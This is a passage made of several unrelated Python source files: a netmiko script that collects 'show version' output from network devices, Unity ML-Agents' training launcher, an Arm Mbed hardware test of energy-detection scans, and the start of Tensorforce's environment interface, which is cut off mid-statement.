    ip_addr = device.ip_address
    creds = device.credentials
    out_dict = {}
    try:
        username = creds.username
        password = creds.password
    except AttributeError:
        # creds is None (or malformed) when no credential object is attached.
        # print() with a single argument is valid on both Python 2 and 3;
        # the original bare print statement is a SyntaxError under Python 3.
        print('%s: No credentials attributes for login. Skipping' % (device))
        return 1
    try:
        rem_conn = netmiko.ConnectHandler(device_type=device_type, ip=ip_addr,
                                          username=username, password=password,
                                          port=port, secret=secret)
    except netmiko.ssh_exception.NetMikoAuthenticationException:
        print(" %s: Unable to connect (check user/pw)" % (device))
        return 1
    out = ('*' * 70) + '\n'
    out += rem_conn.send_command_expect("show version")
    out += ('*' * 70) + '\n'
    out_dict[device.device_name] = out
    queue.put(out_dict)
def main():
    '''
    Spawn one process per device, run "show version" on each in
    parallel, then print the collected output and the elapsed time.
    '''
    django.setup()
    net_devices = NetworkDevice.objects.all()
    start_time = int(time.time())
    queue = Queue(maxsize=20)
    procs = []
    for device in net_devices:
        my_proc = Process(target=run_command, args=(device, queue))
        my_proc.start()
        procs.append(my_proc)
    # Wait for every worker before draining the queue.
    # NOTE(review): joining before draining can deadlock if workers block
    # on a full queue (maxsize=20) — confirm against expected device count.
    for a_proc in procs:
        a_proc.join()
    while not queue.empty():
        my_dict = queue.get()
        # items() instead of the Python 2-only iteritems(), and print()
        # instead of the print statement, so this runs on Python 2 and 3.
        for k, value in my_dict.items():
            print('*' * 70)
            print(k)
            print(value)
    print('\nElapsed time: %s sec' % (int(time.time()) - start_time))
|
learn.py | # # Unity ML-Agents Toolkit
import logging
import argparse
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
from typing import Any, Callable, Optional, List, NamedTuple
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import load_config, TrainerFactory
from mlagents.envs.environment import UnityEnvironment
from mlagents.envs.sampler_class import SamplerManager
from mlagents.envs.exception import SamplerException
from mlagents.envs.base_unity_environment import BaseUnityEnvironment
from mlagents.envs.subprocess_env_manager import SubprocessEnvManager
class CommandLineOptions(NamedTuple):
    """Immutable, typed container for the parsed command-line options.

    Field names must match the argparse ``dest`` names exactly:
    ``from_argparse`` builds an instance via ``**vars(args)``.
    """
    debug: bool                         # verbose trainer/env logging
    num_runs: int                       # number of concurrent training sessions
    seed: int                           # -1 means "pick a random seed"
    env_path: str                       # Unity executable; None -> editor training
    run_id: str                         # directory name for models/summaries
    load_model: bool                    # resume from an existing model
    train_model: bool                   # train (True) vs inference only (False)
    save_freq: int                      # model-save frequency (steps)
    keep_checkpoints: int               # number of checkpoints retained
    base_port: int                      # base port for env communication
    num_envs: int                       # parallel environments per run
    curriculum_folder: Optional[str]    # curriculum JSON directory, if any
    lesson: int                         # starting lesson for all curricula
    slow: bool                          # run at real-time (non-training) speed
    no_graphics: bool                   # launch Unity in no-graphics mode
    multi_gpu: bool                     # enable multi-GPU training if available
    trainer_config_path: str            # trainer-config YAML (positional arg)
    sampler_file_path: Optional[str]    # reset-parameter sampler YAML, if any
    docker_target_name: Optional[str]   # docker volume for training files
    env_args: Optional[List[str]]       # extra args forwarded to the executable
    cpu: bool                           # force CPU-only execution
    @property
    def fast_simulation(self) -> bool:
        """Positive form of --slow, as consumed by TrainerController."""
        return not self.slow
    @staticmethod
    def from_argparse(args: Any) -> "CommandLineOptions":
        """Build options directly from an argparse Namespace."""
        return CommandLineOptions(**vars(args))
def parse_command_line(argv: Optional[List[str]] = None) -> CommandLineOptions:
    """Parse command-line arguments into a CommandLineOptions tuple.

    :param argv: Argument list to parse; None parses sys.argv.
    :return: CommandLineOptions built from the parsed namespace.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    # The single positional argument: path to the trainer-config YAML file.
    parser.add_argument("trainer_config_path")
    parser.add_argument(
        "--env", default=None, dest="env_path", help="Name of the Unity executable "
    )
    parser.add_argument(
        "--curriculum",
        default=None,
        dest="curriculum_folder",
        help="Curriculum json directory for environment",
    )
    parser.add_argument(
        "--sampler",
        default=None,
        dest="sampler_file_path",
        help="Reset parameter yaml file for environment",
    )
    parser.add_argument(
        "--keep-checkpoints",
        default=5,
        type=int,
        help="How many model checkpoints to keep",
    )
    parser.add_argument(
        "--lesson", default=0, type=int, help="Start learning from this lesson"
    )
    parser.add_argument(
        "--load",
        default=False,
        dest="load_model",
        action="store_true",
        help="Whether to load the model or randomly initialize",
    )
    parser.add_argument(
        "--run-id",
        default="ppo",
        help="The directory name for model and summary statistics",
    )
    parser.add_argument(
        "--num-runs", default=1, type=int, help="Number of concurrent training sessions"
    )
    parser.add_argument(
        "--save-freq", default=50000, type=int, help="Frequency at which to save model"
    )
    parser.add_argument(
        "--seed", default=-1, type=int, help="Random seed used for training"
    )
    parser.add_argument(
        "--slow", action="store_true", help="Whether to run the game at training speed"
    )
    parser.add_argument(
        "--train",
        default=False,
        dest="train_model",
        action="store_true",
        help="Whether to train model, or only run inference",
    )
    parser.add_argument(
        "--base-port",
        default=5005,
        type=int,
        help="Base port for environment communication",
    )
    parser.add_argument(
        "--num-envs",
        default=1,
        type=int,
        help="Number of parallel environments to use for training",
    )
    parser.add_argument(
        "--docker-target-name",
        default=None,
        dest="docker_target_name",
        help="Docker volume to store training-specific files",
    )
    parser.add_argument(
        "--no-graphics",
        default=False,
        action="store_true",
        help="Whether to run the environment in no-graphics mode",
    )
    parser.add_argument(
        "--debug",
        default=False,
        action="store_true",
        help="Whether to run ML-Agents in debug mode with detailed logging",
    )
    parser.add_argument(
        "--multi-gpu",
        default=False,
        action="store_true",
        help="Setting this flag enables the use of multiple GPU's (if available) during training",
    )
    # REMAINDER consumes every token after --env-args, so on the command
    # line it must come after all other options.
    parser.add_argument(
        "--env-args",
        default=None,
        nargs=argparse.REMAINDER,
        help="Arguments passed to the Unity executable.",
    )
    parser.add_argument(
        "--cpu", default=False, action="store_true", help="Run with CPU only"
    )
    args = parser.parse_args(argv)
    return CommandLineOptions.from_argparse(args)
def run_training(
    sub_id: int, run_seed: int, options: CommandLineOptions, process_queue: Queue
) -> None:
    """
    Launches a training session (blocks until training finishes).

    :param sub_id: Unique id for this training session; used to suffix
        model paths and ports so concurrent sessions do not collide.
    :param run_seed: Random seed used for training.
    :param options: Parsed command line arguments.
    :param process_queue: Queue used to signal back to main that the
        environment has launched (a single True is put on it).
    """
    # Docker Parameters
    trainer_config_path = options.trainer_config_path
    curriculum_folder = options.curriculum_folder
    # Recognize and use docker volume if one is passed as an argument:
    # with a docker target, all config/model/summary paths are rebased
    # onto the mounted volume.
    if not options.docker_target_name:
        model_path = "./models/{run_id}-{sub_id}".format(
            run_id=options.run_id, sub_id=sub_id
        )
        summaries_dir = "./summaries"
    else:
        trainer_config_path = "/{docker_target_name}/{trainer_config_path}".format(
            docker_target_name=options.docker_target_name,
            trainer_config_path=trainer_config_path,
        )
        if curriculum_folder is not None:
            curriculum_folder = "/{docker_target_name}/{curriculum_folder}".format(
                docker_target_name=options.docker_target_name,
                curriculum_folder=curriculum_folder,
            )
        model_path = "/{docker_target_name}/models/{run_id}-{sub_id}".format(
            docker_target_name=options.docker_target_name,
            run_id=options.run_id,
            sub_id=sub_id,
        )
        summaries_dir = "/{docker_target_name}/summaries".format(
            docker_target_name=options.docker_target_name
        )
    trainer_config = load_config(trainer_config_path)
    # Each session gets its own port block (num_envs ports per session).
    port = options.base_port + (sub_id * options.num_envs)
    if options.env_path is None:
        port = 5004  # This is the in Editor Training Port
    env_factory = create_environment_factory(
        options.env_path,
        options.docker_target_name,
        options.no_graphics,
        run_seed,
        port,
        options.env_args,
    )
    env = SubprocessEnvManager(env_factory, options.num_envs)
    maybe_meta_curriculum = try_create_meta_curriculum(
        curriculum_folder, env, options.lesson
    )
    sampler_manager, resampling_interval = create_sampler_manager(
        options.sampler_file_path, env.reset_parameters, run_seed
    )
    trainer_factory = TrainerFactory(
        trainer_config,
        summaries_dir,
        options.run_id,
        model_path,
        options.keep_checkpoints,
        options.train_model,
        options.load_model,
        run_seed,
        maybe_meta_curriculum,
        options.multi_gpu,
    )
    # Create controller and begin training.
    tc = TrainerController(
        trainer_factory,
        model_path,
        summaries_dir,
        options.run_id + "-" + str(sub_id),
        options.save_freq,
        maybe_meta_curriculum,
        options.train_model,
        run_seed,
        options.fast_simulation,
        sampler_manager,
        resampling_interval,
    )
    # Signal that environment has been launched.
    process_queue.put(True)
    # Begin training
    tc.start_learning(env)
def create_sampler_manager(sampler_file_path, env_reset_params, run_seed=None):
    """
    Build a SamplerManager from an optional sampler-config file.

    :param sampler_file_path: Path to the sampler YAML, or None to create
        a SamplerManager with no sampler config.
    :param env_reset_params: Unused here; kept for call-site compatibility.
    :param run_seed: Seed forwarded to the SamplerManager.
    :return: Tuple of (SamplerManager, resampling interval or None).
    :raises SamplerException: if the config lacks a valid positive-integer
        'resampling-interval'.
    """
    sampler_config = None
    resample_interval = None
    if sampler_file_path is not None:
        sampler_config = load_config(sampler_file_path)
        if "resampling-interval" in sampler_config:
            # Filter arguments that do not exist in the environment
            resample_interval = sampler_config.pop("resampling-interval")
            # Check the type BEFORE comparing with 0: the original order
            # ((interval <= 0) or (not isinstance(...))) raised a bare
            # TypeError instead of the intended SamplerException when the
            # configured value was not a number.
            if (not isinstance(resample_interval, int)) or (resample_interval <= 0):
                raise SamplerException(
                    "Specified resampling-interval is not valid. Please provide"
                    " a positive integer value for resampling-interval"
                )
        else:
            raise SamplerException(
                "Resampling interval was not specified in the sampler file."
                " Please specify it with the 'resampling-interval' key in the sampler config file."
            )
    sampler_manager = SamplerManager(sampler_config, run_seed)
    return sampler_manager, resample_interval
def try_create_meta_curriculum(
    curriculum_folder: Optional[str], env: SubprocessEnvManager, lesson: int
) -> Optional[MetaCurriculum]:
    """Build a MetaCurriculum from the folder, or None when no folder is given.

    All curricula are advanced to the same starting lesson number.
    """
    if curriculum_folder is None:
        return None
    curriculum = MetaCurriculum(curriculum_folder, env.reset_parameters)
    # TODO: Should be able to start learning at different lesson numbers
    # for each curriculum.
    curriculum.set_all_curriculums_to_lesson_num(lesson)
    return curriculum
def prepare_for_docker_run(docker_target_name, env_path):
    """Copy environment files from the docker volume into /ml-agents.

    Every entry directly under /<docker_target_name> whose path contains
    env_path is copied (directories via copytree, files via copyfile with
    the executable bit set). Individual copy failures are logged and
    skipped. Returns env_path rebased under /ml-agents.
    """
    volume_glob = "/{docker_target_name}/*".format(
        docker_target_name=docker_target_name
    )
    for entry in glob.glob(volume_glob):
        if env_path not in entry:
            continue
        try:
            base = os.path.basename(entry)
            destination = "/ml-agents/{b}".format(b=base)
            if os.path.isdir(entry):
                shutil.copytree(entry, destination)
            else:
                shutil.copyfile(entry, destination)
                os.chmod(destination, 0o775)  # Make executable
        except Exception as err:
            # Best-effort copy: log and keep going with the next entry.
            logging.getLogger("mlagents.trainers").info(err)
    return "/ml-agents/{env_path}".format(env_path=env_path)
def create_environment_factory(
    env_path: str,
    docker_target_name: Optional[str],
    no_graphics: bool,
    seed: Optional[int],
    start_port: int,
    env_args: Optional[List[str]],
) -> Callable[[int], BaseUnityEnvironment]:
    """Return a worker_id -> UnityEnvironment factory.

    Executable extensions are stripped from env_path; in docker mode the
    executable is first copied into the container (the COS mount flag on
    some OS/VM images, e.g. the COS GCP Image, prevents executing the
    Unity scene in place). Workers without an explicit seed draw one from
    a pre-generated pool, indexed by worker id.
    """
    if env_path is not None:
        env_path = env_path.strip()
        # NOTE(review): str.replace removes the extension wherever it
        # occurs in the path, not only as a suffix — kept as-is for parity.
        for extension in (".app", ".exe", ".x86_64", ".x86"):
            env_path = env_path.replace(extension, "")
    docker_training = docker_target_name is not None
    if docker_training and env_path is not None:
        # Navigate in docker path and find env_path and copy it.
        env_path = prepare_for_docker_run(docker_target_name, env_path)
    pool_size = 10000
    seed_pool = [np.random.randint(0, pool_size) for _ in range(pool_size)]
    def create_unity_environment(worker_id: int) -> UnityEnvironment:
        # NOTE(review): `not worker_seed` also treats an explicit seed of 0
        # as "unset" and replaces it from the pool — kept as-is for parity.
        worker_seed = seed
        if not worker_seed:
            worker_seed = seed_pool[worker_id % len(seed_pool)]
        return UnityEnvironment(
            file_name=env_path,
            worker_id=worker_id,
            seed=worker_seed,
            docker_training=docker_training,
            no_graphics=no_graphics,
            base_port=start_port,
            args=env_args,
        )
    return create_unity_environment
def main():
    """Entry point: parse options and launch one or more training sessions."""
    # The banner uses box-drawing characters that some consoles/codepages
    # cannot encode; fall back to plain text on any print failure.
    try:
        print(
            """
                        ▄▄▄▓▓▓▓
                   ╓▓▓▓▓▓▓█▓▓▓▓▓
              ,▄▄▄m▀▀▀'  ,▓▓▓▀▓▓▄                           ▓▓▓  ▓▓▌
            ▄▓▓▓▀'      ▄▓▓▀  ▓▓▓      ▄▄     ▄▄ ,▄▄ ▄▄▄▄   ,▄▄ ▄▓▓▌▄ ▄▄▄    ,▄▄
          ▄▓▓▓▀        ▄▓▓▀   ▐▓▓▌     ▓▓▌   ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌  ╒▓▓▌
        ▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓      ▓▀      ▓▓▌   ▐▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▌   ▐▓▓▄ ▓▓▌
        ▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄     ▓▓      ▓▓▌   ▐▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▌    ▐▓▓▐▓▓
          ^█▓▓▓        ▀▓▓▄   ▐▓▓▌     ▓▓▓▓▄▓▓▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▓▄    ▓▓▓▓`
            '▀▓▓▓▄      ^▓▓▓  ▓▓▓       └▀▀▀▀ ▀▀ ^▀▀    `▀▀ `▀▀   '▀▀    ▐▓▓▌
               ▀▀▀▀▓▄▄▄   ▓▓▓▓▓▓,                                      ▓▓▓▓▀
                   `▀█▓▓▓▓▓▓▓▓▓▌
                        ¬`▀▀▀█▓
        """
        )
    except Exception:
        print("\n\n\tUnity Technologies\n")
    options = parse_command_line()
    trainer_logger = logging.getLogger("mlagents.trainers")
    env_logger = logging.getLogger("mlagents.envs")
    trainer_logger.info(options)
    if options.debug:
        trainer_logger.setLevel("DEBUG")
        env_logger.setLevel("DEBUG")
    # Editor training supports a single session only (fixed editor port).
    if options.env_path is None and options.num_runs > 1:
        raise TrainerError(
            "It is not possible to launch more than one concurrent training session "
            "when training from the editor."
        )
    jobs = []
    run_seed = options.seed
    if options.cpu:
        # Hide all GPUs from TensorFlow/CUDA.
        os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
    if options.num_runs == 1:
        # Single run: train in this process, no child processes needed.
        if options.seed == -1:
            run_seed = np.random.randint(0, 10000)
        run_training(0, run_seed, options, Queue())
    else:
        # Multiple runs: one child process each, started sequentially.
        # NOTE(review): with an explicit seed (not -1), every run gets the
        # same seed — confirm that is intended for concurrent sessions.
        for i in range(options.num_runs):
            if options.seed == -1:
                run_seed = np.random.randint(0, 10000)
            process_queue = Queue()
            p = Process(target=run_training, args=(i, run_seed, options, process_queue))
            jobs.append(p)
            p.start()
            # Wait for signal that environment has successfully launched
            while process_queue.get() is not True:
                continue
    # Wait for jobs to complete. Otherwise we'll have an extra
    # unhandled KeyboardInterrupt if we end early.
    try:
        for job in jobs:
            job.join()
    except KeyboardInterrupt:
        pass
# Script entry point; also lets a Python debugger run this file directly.
if __name__ == "__main__":
    main()
|
ED_scan.py | """
Copyright (c) 2017, Arm Limited and affiliates.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
import os,sys
from icetea_lib.bench import Bench
class Testcase(Bench):
    # Three-device MAC test: First and Third flood the configured channel
    # with data traffic from a background thread while Second performs an
    # ED (energy detection) scan and analyzes the result.
    def __init__(self):
        Bench.__init__(self, name = "ED_scan",
                       title = "ED scan test",
                       status = "development",
                       type = "smoke",
                       subtype = "",
                       execution = {
                           "skip": {
                               "value": False,
                               "reason": ""
                           }
                       },
                       author = "Valtteri Erkkila",
                       purpose = "Tests reading the ED values from channels 11-16",
                       feature = ["MLME-SCAN (ED)"],
                       component = ["MAC"],
                       requirements = {
                           "duts": {
                               '*': {
                                   "count":3,
                                   "type": "hardware",
                                   "allowed_platforms": ["K64F", "K66F", "NUCLEO_F429ZI", "KW24D", "UBLOX_EVK_ODIN_W2"],
                                   "application": {
                                       "name": "TEST_APPS-device-nanostack_mac_tester"
                                   }
                               },
                               "1":{"nick": "First"},
                               "2":{"nick": "Second"},
                               "3":{"nick": "Third"}
                           }}
                       )
    def setUp(self):
        """Assign distinct 64-bit MAC addresses to the three DUTs."""
        self.channel = 11
        self.command("First", "addr --64-bit 01:02:03:00:00:00:00:01")
        self.command("Second", "addr --64-bit 01:02:03:00:00:00:00:02")
        self.command("Third", "addr --64-bit 01:02:03:00:00:00:00:03")
    def spam_channel(self, event):
        """Background thread body: keep First<->Third traffic flowing.

        Sends a data frame in each direction every 100 ms until the stop
        event is set; lock_th serializes access with case()'s resets.
        """
        while not event.wait(0.1):
            self.lock_th.acquire()
            self.command("First", "data --dst_addr 01:02:03:00:00:00:00:03 --msdu {} --msdu_length {} --wait_for_confirm false".format(self.payload, len(self.payload)))
            self.command("Third", "data --dst_addr 01:02:03:00:00:00:00:01 --msdu {} --msdu_length {} --wait_for_confirm false".format(self.payload, len(self.payload)))
            self.lock_th.release()
    def mask_from_channel_list(self, channels):
        """Return a hex channel-mask string with one bit set per channel."""
        res = 0
        for ch in channels:
            res = res | ( 1 << ch)
        return hex(res)
    def case(self):
        self.lock_th = threading.Lock()
        self.payload = "01234567890123456789012345678901234567890123456789"
        self.command("First", "start --pan_coordinator true --logical_channel {}".format(self.channel))
        self.command("Second", "start --pan_coordinator false --logical_channel {}".format(self.channel))
        self.command("Third", "start --pan_coordinator false --logical_channel {}".format(self.channel))
        #No reason to print their spamming
        self.command("First", "silent-mode on")
        self.command("Third", "silent-mode on")
        # Start the background traffic thread (stopped in tearDown).
        self.stop_event = threading.Event()
        self.th = threading.Thread(target=self.spam_channel, args=(self.stop_event,))
        self.th.start()
        # NOTE(review): 'stopped' is written here but never read in this class.
        self.stopped = True
        # NOTE(review): purpose says channels 11-16, but this mask covers
        # channels 11-26 — confirm the intended scan range.
        channels = range(11,27)
        for i in range(0, 3):
            # Hold the lock so the spam thread cannot send while the
            # coordinator/device are being reset and restarted.
            self.lock_th.acquire()
            self.command("First", "mlme-reset")
            self.command("First", "start --pan_coordinator true --logical_channel {}".format(self.channel))
            self.command("Third", "mlme-reset")
            self.command("Third", "start --pan_coordinator false --logical_channel {}".format(self.channel))
            self.lock_th.release()
            # scan_type 0 = ED scan; Second then checks the measured energy.
            self.command("Second", "scan --scan_type 0 --scan_duration 7 --channel_mask {}".format(self.mask_from_channel_list(channels)))
            self.command("Second", "analyze-ed --channel {} --above 100".format(self.channel))
    def tearDown(self):
        """Stop the traffic thread, restore output, and reset the DUTs."""
        self.command("First", "silent-mode off")
        self.command("Third", "silent-mode off")
        self.stop_event.set()
        self.th.join()
        del self.th
        self.reset_dut()
|
environment.py | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import importlib
import json
import os
import sys
from threading import Thread
import time
from traceback import format_tb
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
    """
    Tensorforce environment interface.
    """
    @staticmethod
    def create(
        environment=None, max_episode_timesteps=None, remote=None, blocking=False, host=None,
        port=None, **kwargs
    ):
        """
        Creates an environment from a specification. In case of "socket-server" remote mode, runs
        environment in server communication loop until closed.
        Args:
            environment (specification | Environment class/object): JSON file, specification key,
                configuration dictionary, library module, `Environment` class/object, or gym.Env
                (<span style="color:#C00000"><b>required</b></span>, invalid for "socket-client"
                remote mode).
            max_episode_timesteps (int > 0): Maximum number of timesteps per episode, overwrites
                the environment default if defined
                (<span style="color:#00C000"><b>default</b></span>: environment default, invalid
                for "socket-client" remote mode).
            remote ("multiprocessing" | "socket-client" | "socket-server"): Communication mode for
                remote environment execution of parallelized environment execution, "socket-client"
                mode requires a corresponding "socket-server" running, and "socket-server" mode
                runs environment in server communication loop until closed
                (<span style="color:#00C000"><b>default</b></span>: local execution).
            blocking (bool): Whether remote environment calls should be blocking
                (<span style="color:#00C000"><b>default</b></span>: not blocking, invalid unless
                "multiprocessing" or "socket-client" remote mode).
            host (str): Socket server hostname or IP address
                (<span style="color:#C00000"><b>required</b></span> only for "socket-client" remote
                mode).
            port (int): Socket server port
                (<span style="color:#C00000"><b>required</b></span> only for "socket-client/server"
                remote mode).
            kwargs: Additional arguments.
        """
        # Reject arguments that only make sense for specific remote modes.
        if remote not in ('multiprocessing', 'socket-client'):
            if blocking:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='blocking',
                    condition='no multiprocessing/socket-client instance'
                )
        if remote not in ('socket-client', 'socket-server'):
            if host is not None:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='host', condition='no socket instance'
                )
            elif port is not None:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='port', condition='no socket instance'
                )
        # Remote execution modes: delegate to the corresponding backend.
        if remote == 'multiprocessing':
            from tensorforce.environments import MultiprocessingEnvironment
            environment = MultiprocessingEnvironment(
                blocking=blocking, environment=environment,
                max_episode_timesteps=max_episode_timesteps, **kwargs
            )
            return environment
        elif remote == 'socket-client':
            # The remote side owns the environment spec; only connection
            # parameters are valid here.
            if environment is not None:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='environment',
                    condition='socket-client instance'
                )
            elif max_episode_timesteps is not None:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='max_episode_timesteps',
                    condition='socket-client instance'
                )
            elif len(kwargs) > 0:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='kwargs',
                    condition='socket-client instance'
                )
            from tensorforce.environments import SocketEnvironment
            environment = SocketEnvironment(host=host, port=port, blocking=blocking)
            return environment
        elif remote == 'socket-server':
            # Runs the server loop until closed; note: no return value.
            from tensorforce.environments import SocketEnvironment
            SocketEnvironment.remote(
                port=port, environment=environment, max_episode_timesteps=max_episode_timesteps,
                **kwargs
            )
        # Local execution: resolve the environment specification recursively.
        elif isinstance(environment, (EnvironmentWrapper, RemoteEnvironment)):
            # Already fully wrapped; no further arguments may apply.
            if max_episode_timesteps is not None:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='max_episode_timesteps',
                    condition='EnvironmentWrapper instance'
                )
            if len(kwargs) > 0:
                raise TensorforceError.invalid(
                    name='Environment.create', argument='kwargs',
                    condition='EnvironmentWrapper instance'
                )
            return environment
        elif isinstance(environment, type) and \
                issubclass(environment, (EnvironmentWrapper, RemoteEnvironment)):
            # Wrapper *classes* cannot be instantiated via create().
            raise TensorforceError.type(
                name='Environment.create', argument='environment', dtype=type(environment)
            )
        elif isinstance(environment, Environment):
            # Plain instance: wrap it to enforce the episode-length limit.
            return EnvironmentWrapper(
                environment=environment, max_episode_timesteps=max_episode_timesteps
            )
        elif isinstance(environment, type) and issubclass(environment, Environment):
            # Environment subclass: instantiate, then recurse to wrap.
            environment = environment(**kwargs)
            assert isinstance(environment, Environment)
            return Environment.create(
                environment=environment, max_episode_timesteps=max_episode_timesteps
            )
        elif isinstance(environment, dict):
            # Dictionary specification
            util.deep_disjoint_update(target=kwargs, source=environment)
            environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
            assert environment is not None
            if max_episode_timesteps is None:
                max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
            return Environment.create(
                environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
            )
        elif isinstance(environment, str):
            if os.path.isfile(environment):
                # JSON file specification
                with open(environment, 'r') as fp:
                    environment = json.load(fp=fp)
                util.deep_disjoint_update(target=kwargs, source=environment)
                environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
                assert environment is not None
                if max_episode_timesteps is None:
                    max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
                return Environment.create(
                    environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
                )
            elif '.' in environment:
                # Library specification
                library_name, module_name = environment.rsplit('.', 1)
                library = importlib.import_module(name=library_name)
                environment = getattr(library, module_name)
                return Environment.create(
                    environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
                )
            elif environment in tensorforce.environments.environments:
                # Keyword specification
                environment = tensorforce.environments.environments[environment]
                return Environment.create(
                    environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
                )
            else:
                # Default: OpenAI Gym
                try:
                    return Environment.create(
                        environment='gym', level=environment,
                        max_episode_timesteps=max_episode_timesteps, **kwargs
                    )
                except TensorforceError:
                    raise TensorforceError.value(
                        name='Environment.create', argument='environment', value=environment
                    )
        else:
            # Default: OpenAI Gym
            from gym import Env
            if isinstance(environment, Env) or \
                    (isinstance(environment, type) and issubclass(environment, Env)):
                return Environment.create(
                    environment='gym', level=environment,
                    max_episode_timesteps=max_episode_timesteps, **kwargs
                )
            else:
                raise TensorforceError.type(
                    name='Environment.create', argument='environment', dtype=type(environment)
                )
    def __init__(self):
        # first two arguments, if applicable: level, visualize=False
        util.overwrite_staticmethod(obj=self, function='create')
        # Name of the pending asynchronous call ('reset'/'execute'), or None.
        self._expect_receive = None
        # Actions buffered by start_execute() until receive_execute() runs.
        self._actions = None
    def __str__(self):
        return self.__class__.__name__
    def states(self):
        """
        Returns the state space specification.
        Returns:
            specification: Arbitrarily nested dictionary of state descriptions with the following
            attributes:
            <ul>
            <li><b>type</b> (<i>"bool" | "int" | "float"</i>) &ndash; state data type
            (<span style="color:#00C000"><b>default</b></span>: "float").</li>
            <li><b>shape</b> (<i>int | iter[int]</i>) &ndash; state shape
            (<span style="color:#C00000"><b>required</b></span>).</li>
            <li><b>num_states</b> (<i>int > 0</i>) &ndash; number of discrete state values
            (<span style="color:#C00000"><b>required</b></span> for type "int").</li>
            <li><b>min_value/max_value</b> (<i>float</i>) &ndash; minimum/maximum state value
            (<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
            </ul>
        """
        raise NotImplementedError
    def actions(self):
        """
        Returns the action space specification.
        Returns:
            specification: Arbitrarily nested dictionary of action descriptions with the following
            attributes:
            <ul>
            <li><b>type</b> (<i>"bool" | "int" | "float"</i>) &ndash; action data type
            (<span style="color:#C00000"><b>required</b></span>).</li>
            <li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) &ndash; action shape
            (<span style="color:#00C000"><b>default</b></span>: scalar).</li>
            <li><b>num_actions</b> (<i>int > 0</i>) &ndash; number of discrete action values
            (<span style="color:#C00000"><b>required</b></span> for type "int").</li>
            <li><b>min_value/max_value</b> (<i>float</i>) &ndash; minimum/maximum action value
            (<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
            </ul>
        """
        raise NotImplementedError
    def max_episode_timesteps(self):
        """
        Returns the maximum number of timesteps per episode.
        Returns:
            int: Maximum number of timesteps per episode.
        """
        return None
    def close(self):
        """
        Closes the environment.
        """
        pass
    def reset(self):
        """
        Resets the environment to start a new episode.
        Returns:
            dict[state]: Dictionary containing initial state(s) and auxiliary information.
        """
        raise NotImplementedError
    def execute(self, actions):
        """
        Executes the given action(s) and advances the environment by one step.
        Args:
            actions (dict[action]): Dictionary containing action(s) to be executed
                (<span style="color:#C00000"><b>required</b></span>).
        Returns:
            dict[state], bool | 0 | 1 | 2, float: Dictionary containing next state(s), whether
            a terminal state is reached or 2 if the episode was aborted, and observed reward.
        """
        raise NotImplementedError
    def start_reset(self):
        """Begin an asynchronous reset; complete it via receive_execute()."""
        if self._expect_receive is not None:
            raise TensorforceError.unexpected()
        self._expect_receive = 'reset'
    def start_execute(self, actions):
        """Begin an asynchronous execute of the given actions; complete it
        via receive_execute()."""
        if self._expect_receive is not None:
            raise TensorforceError.unexpected()
        self._expect_receive = 'execute'
        assert self._actions is None
        self._actions = actions
    def receive_execute(self):
        """Complete the pending start_reset()/start_execute() call.

        Returns a (states, terminal, reward) triple; for a reset, terminal
        is -1 and reward is None. Raises if no call is pending.
        """
        if self._expect_receive == 'reset':
            self._expect_receive = None
            return self.reset(), -1, None
        elif self._expect_receive == 'execute':
            self._expect_receive = None
            assert self._actions is not None
            states, terminal, reward = self.execute(actions=self._actions)
            self._actions = None
            return states, int(terminal), reward
        else:
            raise TensorforceError.unexpected()
class EnvironmentWrapper(Environment):
    """Wraps an Environment to enforce a maximum episode length.

    execute() counts timesteps and reports terminal value 2 (episode
    aborted) once the limit is reached; any attribute not listed in
    _ATTRIBUTES is delegated to the wrapped environment.
    """
    def __init__(self, environment, max_episode_timesteps):
        super().__init__()
        # Never wrap a wrapper.
        if isinstance(environment, EnvironmentWrapper):
            raise TensorforceError.unexpected()
        # The wrapper may only tighten the limit, never extend it beyond
        # what the environment itself declares.
        if environment.max_episode_timesteps() is not None and \
                max_episode_timesteps is not None and \
